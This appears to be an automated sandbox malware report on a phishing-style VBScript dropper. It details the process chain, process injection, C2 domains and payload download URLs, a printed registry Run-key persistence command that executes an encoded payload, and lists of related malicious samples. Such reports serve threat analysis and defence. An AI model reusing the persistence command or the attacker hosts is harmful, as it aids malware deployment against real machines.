    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[base64-encoded command omitted]"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DC.tmp" "c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP"
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Touchb.vbs"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[base64 encoded command omitted]"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08745AE4 CreateNamedPipeW,2_2_08745AE4
MITRE ATT&CK Matrix (techniques listed per tactic column; the figures in square brackets are those printed beside the technique in the report):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Command and Scripting Interpreter [11]; Scripting [221]; PowerShell [2]; At (Windows); Cron; Launchd; Scheduled Task
Persistence: Registry Run Keys / Startup Folder [1]; DLL Side-Loading [1]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection [112]; Registry Run Keys / Startup Folder [1]; DLL Side-Loading [1]; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [131]; Process Injection [112]; Deobfuscate/Decode Files or Information [1]; Scripting [221]; Obfuscated Files or Information [2]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery [111]; Process Discovery [1]; Virtualization/Sandbox Evasion [131]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [13]; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel [11]; Non-Standard Port [1]; Ingress Tool Transfer [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [213]; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: Modify System Partition; Device Lockout; Delete Device Data; Data Encrypted for Impact
Behavior Graph (ID: 625175, Sample: PO-19903.vbs, Startdate: 12/05/2022, Architecture: WINDOWS, Score: 100)

Sample-level network: vegproworld.com; toshiba1122.duckdns.org; 5 other IPs or domains
Sample-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Antivirus detection for URL or domain; 5 other signatures

Process tree (matched signatures in square brackets; the figures after process names are those printed in the graph):
wscript.exe 2 [Wscript starts Powershell (via cmd or directly); Very long command line found; Encrypted powershell cmdline option found]
    powershell.exe 25 [Writes to foreign memory regions; Tries to detect Any.run]
        ieinstal.exe 8 8 [Tries to detect Any.run]
            network: toshiba1122.ddns.net 197.210.226.45, 3360 VCG-ASNG Nigeria; toshiba1122.duckdns.org 194.5.98.59, 3360, 49741, 49743 DANILENKODE Netherlands; 3 other IPs or domains
            wscript.exe 2 [Wscript starts Powershell (via cmd or directly); Very long command line found; Encrypted powershell cmdline option found]
                powershell.exe 1
                    conhost.exe
        csc.exe 3
            dropped: C:\Users\user\AppData\Local\...\ppgnlr3u.dll, PE32
            cvtres.exe 1
        conhost.exe

Source | Detection | Scanner | Label
PO-19903.vbs | 20% | ReversingLabs | Script.Trojan.Valyria

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner
l-0004.l-dc-msedge.net | 0% | Virustotal
toshiba1122.duckdns.org | 2% | Virustotal
vegproworld.com | 5% | Virustotal
toshiba1122.ddns.net | 2% | Virustotal

Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 100% | Avira URL Cloud | malware
https://go.micro | 0% | Avira URL Cloud | safe
https://vegproworld.com/:k | 0% | Avira URL Cloud | safe
https://contoso.com/ | 0% | Avira URL Cloud | safe
https://vegproworld.com/rj-$ | 0% | Avira URL Cloud | safe
https://contoso.com/License | 0% | Avira URL Cloud | safe
https://contoso.com/Icon | 0% | Avira URL Cloud | safe
https://vegproworld.com/wp-content/Touchb.vbs | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
l-0004.l-dc-msedge.net | 13.107.43.13 | true | false | | unknown
toshiba1122.duckdns.org | 194.5.98.59 | true | true | | unknown
vegproworld.com | 148.66.138.165 | true | true | | unknown
toshiba1122.ddns.net | 197.210.226.45 | true | true | | unknown
onedrive.live.com | unknown | unknown | false | | high
jgdbpa.am.files.1drv.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://onedrive.live.com/download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304UDXKDuEA | false | | high
https://vegproworld.com/wp-content/Touchb.vbs | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000002.00000002.4973562589.00000000059A6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jgdbpa.am.files.1drv.com/y4maRwf2HHiC3pXkJNQF9GW7D5PTiYgoa5jSqqmo4o-s2nHza5cDyEK1j43pCU9Ua1Y | ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://vegproworld.com/:k | ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://vegproworld.com/rj-$ | ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://onedrive.live.com/download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304 | ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://onedrive.live.com/ndows | ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://jgdbpa.am.files.1drv.com/y4mstf71DnOKqqDiI505gr5x-9GCiHWv5DdrHG7ALTidojrV4lxxrd7sQ3eLTcarbaq | ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4444820883.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8459529246.0000000002C3E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://onedrive.live.com/: | ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://jgdbpa.am.files.1drv.com/ | ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://onedrive.live.com/ | ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
13.107.43.13 | l-0004.l-dc-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
197.210.226.45 | toshiba1122.ddns.net | Nigeria | 29465 | VCG-ASNG | true
197.210.226.89 | unknown | Nigeria | 29465 | VCG-ASNG | false
148.66.138.165 | vegproworld.com | Singapore | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
194.5.98.59 | toshiba1122.duckdns.org | Netherlands | 208476 | DANILENKODE | true
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 625175
Start date and time: 2022-05-12 13:58:01 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 47s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: PO-19903.vbs
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winVBS@15/12@15/5
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 161
• Number of non-executed functions: 14
Cookbook Comments:
• Found application associated with file extension: .vbs
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe, MusNotificationUx.exe
• Excluded IPs from analysis (whitelisted): 13.107.42.12
• Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, odc-web-brs.onedrive.akadns.net, wdcpalt.microsoft.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, odc-am-files-geo.onedrive.akadns.net, am-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, wdcp.microsoft.com, odc-am-files-brs.onedrive.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
14:01:00 | API Interceptor | 38x Sleep call for process: powershell.exe modified
14:01:34 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Denialsch %Vitell% -w 1 $altdelggen=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').konjun;%Vitell% -encodedcommand($altdelggen)
14:01:38 | API Interceptor | 81x Sleep call for process: ieinstal.exe modified
14:01:42 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Denialsch %Vitell% -w 1 $altdelggen=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').konjun;%Vitell% -encodedcommand($altdelggen)
Match | Associated Sample Name / URL | Detection | Context
13.107.43.13 | Swift Payment.exe | malicious | onedrive.live.com/download?cid=1E582A8096DD63EB&resid=1E582A8096DD63EB%214709&authkey=ABJaTATfjfr7CGs
13.107.43.13 | SecuriteInfo.com.Trojan.Mardom.MN.13.1847.exe | malicious | onedrive.live.com/download?cid=07DD3EC4CF18C540&resid=7DD3EC4CF18C540%21153&authkey=AI0NEJO_5vYnXcM
148.66.138.165 | IMG-0985443WA.vbs | malicious |
148.66.138.165 | Maersk Your Transport Plan has Changed.vbs | malicious |
148.66.138.165 | Arrival_Notice_BL_No_607954658.vbs | malicious |
148.66.138.165 | commercial invoice.vbs | malicious |
148.66.138.165 | Telex_WA00943.vbs | malicious |
Match | Associated Sample Name / URL | Detection | Context

Match: l-0004.l-dc-msedge.net (context for every entry: 13.107.43.13); associated samples, all detected malicious:
VbmzgOe1Fz4Uga_PI3miSQ9U3_9DMk7Z3HHiGkggepo.exe; DOC053662562566.PDF.exe; INVOICE 0.exe; Siparis eklendi.exe; Document.exe; SecuriteInfo.com.Variant.Zusy.423667.18777.exe; SecuriteInfo.com.Variant.Zusy.423667.1117.exe; SecuriteInfo.com.Variant.Zusy.423667.20128.exe; GpWp9qqlTI.exe; FHqksAC2JH.exe; SLTiDC-Attachment.exe; Document.exe; annoncere.vbs; CMACGM-WBINS9013246-20210714-125247.pdf.vbs; CHANGE OF ACCOUNT RUSH TO DESK.exe; SecuriteInfo.com.Trojan.Siggen17.48628.31246.exe; DOCUMENT.EXE; Swift.vbs; attached booking price list.exe; Bftkdpihzmqqayhvbimrsgovwrhmxmgnqx.exe

Match: toshiba1122.duckdns.org (context for every entry: 194.5.98.59); associated samples, all detected malicious:
IMG-0985443WA.vbs; Telex_WA00943.vbs; NEW ORDER.vbs; Contract No5757.vbs; Doc031032022 PDF.vbs; IMG_WA2803396-Sales Contract.vbs; PO#705363.vbs; Inv-1045005852.vbs; SCAN 0047543.vbs; IMG_0032323 pdf.vbs; DOC 0321 PDF.vbs
Match | Associated Sample Name / URL | Detection | Context
MICROSOFT-CORP-MSN-AS-BLOCKUS | FLEVhQ4JIM | malicious | 20.17.17.237
MICROSOFT-CORP-MSN-AS-BLOCKUS | Colpal (1).zip | malicious | 20.42.73.26
MICROSOFT-CORP-MSN-AS-BLOCKUS | rrRlkBgAuN.exe | malicious | 52.147.15.202
MICROSOFT-CORP-MSN-AS-BLOCKUS | fye9EzZsJn | malicious | 20.116.102.224
MICROSOFT-CORP-MSN-AS-BLOCKUS | Colpal.zip | malicious | 52.109.76.68
MICROSOFT-CORP-MSN-AS-BLOCKUS | Jt6QvtTzkr | malicious | 20.71.192.122
MICROSOFT-CORP-MSN-AS-BLOCKUS | xHNFkxuGUe | malicious | 20.231.62.42
MICROSOFT-CORP-MSN-AS-BLOCKUS | VirginMediaBill26012020.msi | malicious | 13.107.246.60
MICROSOFT-CORP-MSN-AS-BLOCKUS | VbmzgOe1Fz4Uga_PI3miSQ9U3_9DMk7Z3HHiGkggepo.exe | malicious | 13.107.43.13
MICROSOFT-CORP-MSN-AS-BLOCKUS | AURA ORDER - N#U00b020254 aftral.com pdf.htm | malicious | 13.107.219.45
MICROSOFT-CORP-MSN-AS-BLOCKUS | mHPPHO5OR9.exe | malicious | 20.187.86.47
MICROSOFT-CORP-MSN-AS-BLOCKUS | VUmNBy0lUm.exe | malicious | 20.187.86.47
MICROSOFT-CORP-MSN-AS-BLOCKUS | iI1zkVk6s7 | malicious | 13.92.173.122
MICROSOFT-CORP-MSN-AS-BLOCKUS | e72ITJuMTX | malicious | 65.52.164.132
MICROSOFT-CORP-MSN-AS-BLOCKUS | DOC053662562566.PDF.exe | malicious | 13.107.43.13
MICROSOFT-CORP-MSN-AS-BLOCKUS | jKira.arm7 | malicious | 20.21.92.58
                                              INVOICE 0.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              Siparis eklendi.exeGet hashmaliciousBrowse
                                              • 13.107.43.13
                                              hBR6GCeDzu.exeGet hashmaliciousBrowse
                                              • 104.47.53.36
                                              ARC Publications LLC.zipGet hashmaliciousBrowse
                                              • 52.113.195.132
                                              VCG-ASNGmeihao.i686Get hashmaliciousBrowse
                                              • 197.210.170.8
                                              5pnX0Gx4rBGet hashmaliciousBrowse
                                              • 102.91.187.124
                                              2LETP8ZtB4Get hashmaliciousBrowse
                                              • 102.90.41.197
                                              P2DIWOtpLf.exeGet hashmaliciousBrowse
                                              • 102.89.42.162
                                              U7Ncg7oAyC.exeGet hashmaliciousBrowse
                                              • 102.89.42.162
                                              lg5wG9Xf5M.exeGet hashmaliciousBrowse
                                              • 102.89.42.162
                                              OhUPHp2w8EGet hashmaliciousBrowse
                                              • 102.90.150.226
                                              fNZWXg6eAYGet hashmaliciousBrowse
                                              • 197.210.170.6
                                              i686Get hashmaliciousBrowse
                                              • 102.90.41.183
                                              miori.arm-20220508-0750Get hashmaliciousBrowse
                                              • 102.91.140.120
                                              JT6FiOc0bNGet hashmaliciousBrowse
                                              • 41.206.0.76
                                              arm7Get hashmaliciousBrowse
                                              • 197.210.99.181
                                              BilI03ekGoGet hashmaliciousBrowse
                                              • 197.210.99.180
                                              x86Get hashmaliciousBrowse
                                              • 197.210.99.192
                                              IMG-0985443WA.vbsGet hashmaliciousBrowse
                                              • 197.210.79.183
                                              arm7Get hashmaliciousBrowse
                                              • 197.210.99.195
                                              x86Get hashmaliciousBrowse
                                              • 197.210.99.198
                                              mipsel-20220504-1137Get hashmaliciousBrowse
                                              • 197.210.224.152
                                              x86-20220503-2250Get hashmaliciousBrowse
                                              • 102.91.140.144
                                              commercial invoice.vbsGet hashmaliciousBrowse
                                              • 197.210.227.46
                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              37f463bf4616ecd445d4a1937da06e19SD 2477.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              FIREANGEL SAFETY TECHNOLOGY PLC.htmlGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              https://login-auth4gpzpzddt7z5sf8a71rh1rhqw9aq0bmjd7m4jszkr22.website.yandexcloud.net/?sscid=51k6_burmo#res@res.esGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              SecuriteInfo.com.Variant.Jaik.72893.16950.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              https://ad.doubleclick.net/ddm/clk/457245084;261660784;o;u=ds&sv1=64659318519&sv2=3270347400160313&sv3=5513163273413763428&gclid=CJykqNzo5fMCFclCHQkdk2EFmQ;%3fhttps://redirect.skimlinks.com/?id%253D179135X1650605%2526xs%253D1%2526url=http%3A%2F%2Fwww.amazon.com%2Famazon%2Famazon%2Famazon3696717%2F&url=https%3A%2F%2Flogin-sok7upku1isa34nsmlu5maqmq7an2i5x6ubb0ztdtsh.website%E2%80%8B.yandexcloud.net%23j.jainaga@sidenor.comGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              https://glaze-iridescent-organization.glitch.me/a.htmlGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              https://r1.dotdigital-pages.com/p/7EPW-BJ/erasmosGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              https://r1.dotdigital-pages.com/p/7EQ5-BN/dftrGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              https://ad.doubleclick.net/ddm/clk/492846694;299712857;l;u=ds&sv1=0&sv2=3254733571074777&sv3=7926384508747481539&gclid=COyqr9nNgvICFYcDGwodblkA3A;%3fhttps://redirect.skimlinks.com/?id%253D179135X1650605%2526xs%253D1%2526url=http%3A%2F%2Fwww.amazon.com%2Famazon%2Famazon%2Famazon3696717%2F&url=https%3A%2F%2Fsign-wycf7djeeypdnjeaquy9vd3qfoaj63fb9opm4la83zc.website%E2%80%8B.yandexcloud.net%23adrian.steiger@zehndergroup.comGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              DOC053662562566.PDF.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              INVOICE 0.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              YzZvXNPftX.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              BJgh7q8C66.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              #Uc6b8#Ud2b8#Ub77c#Uc11c#Ud5041017_14611.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              Siparis eklendi.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              Kaufvertrag.lnkGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              z3754379502.xlsbGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              oU7LPK10a3.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              9vfBClHPAP.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              uKcolM7qoh.exeGet hashmaliciousBrowse
                                              • 148.66.138.165
                                              • 13.107.43.13
                                              No context
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):5829
                                              Entropy (8bit):4.901739309084484
                                              Encrypted:false
                                              SSDEEP:96:7sCJ2Woe5wv2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXz9smqFRLcu:Pxoe5GVsm5emdsgkjDt4iWN3yBGHD9sj
                                              MD5:282A064FB3F0E58EC10467E027EA203A
                                              SHA1:B5DCBF5AE67C4B57BA74CA9F614CFB2341F2E62A
                                              SHA-256:86E625B4810E5358AD45B8D99BAB9F94671D39F1424F6E66F1B0661E73E4074F
                                              SHA-512:984F355177D075808049E713A5DFCC12A742CBEF8F3499201C3798EF7A156F8A80A71BB589400D3AFBD5DEDEC4FA0EFD66148F02FAEB2881298D4529F659EF3F
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                              Process:C:\Windows\System32\wscript.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):59179
                                              Entropy (8bit):7.382148699631125
                                              Encrypted:false
                                              SSDEEP:1536:h+3+oNMsrhj0KX8PR8u6DXwceBy0SE9trLu:Y+NuhQzJ8xrVf0bfLu
                                              MD5:DD9476AAE299F8CD938C0948F1F1C984
                                              SHA1:CB7F30DDE5A14A71FB33FDD8EDECADFBDB59F178
                                              SHA-256:6E63C9314D2B7EEFE27553D57326E4A39DCE0C360CDBF1E5B146C244A0E09EBA
                                              SHA-512:B2E5D0FC61FD41F9135960A0B1C602A3129E9C620ABC233476CFCAFAF827205A0A9E50B80920FFA1713D814C749D3D165462FD06C2EEF9F2AFA1F7A9841FDA3D
                                              Malicious:false
                                              Preview:......h#.a:.4$1..`.,$...ZZ.._1..4...r.@@@@9.u.W.......H;s..e.!.I.$....d.L.G.m.l..:..Z7.XvB.m.!......w.W.M.t....^)\...p*...2|.u....}w.....\.2(.7..F..{....p8...{..z.......c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c.].....*../.@..../.ed.b.M`....s...1.....y.+T.T..j.e....R.du...i.2.N{.E...._aZ~...u.W...... :.P.8...V..@(..r%.......B.z....@E.R{ ..n~..@>.o.....B...c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..k......qf...M...pPJs...V...m.'1.Z9J.8....%..%...q..*...\..v..b.....!..6.p}.n..9.X...k%....b....r...r.T.36...UJ9P...N.&...XARW...-..../Y6{...F.}.=...{.....Ip.V.o...........r.b=...A...C..r...J9P...N.&...XARW...-..../Y6{...F.}.=...{.....Ip.V.o........EI%....7.......r.J.1.....N..b.....!..6.p}.n..9.X...k%.'1.Z9J.8....%..%...q..*...\..v@...E.<...=./..L.Ht......D....F...L...X.(..v.Y+..%.X..r....E*Hn<../bI....7..<.........nf.r.(......G..P.H....]..%.
                                              Process:C:\Windows\SysWOW64\wscript.exe
                                              File Type:data
